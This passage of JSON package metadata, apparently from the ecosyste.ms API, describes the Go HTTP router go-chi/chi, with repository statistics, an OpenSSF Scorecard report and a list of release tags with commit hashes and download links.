,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v0/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v0/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v0/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v0/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v0/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v0/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":3748775,"name":"github.com/Go-chi/chi","ecosystem":"go","description":"","homepage":"https://github.com/Go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/Go-chi/chi","keywords_array":[],"namespace":"github.com/Go-chi","versions_count":11,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2023-09-07T09:35:12.000Z","latest_release_number":"v1.5.5","last_synced_at":"2026-08-12T02:06:22.642Z","created_at":"2022-04-11T15:09:55.970Z","updated_at":"2026-08-12T02:06:22.642Z","registry_url":"https://pkg.go.dev/github.com/Go-chi/chi","install_command":"go get github.com/Go-chi/chi","documentation_url":"https://pkg.go.dev/github.com/Go-chi/chi#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/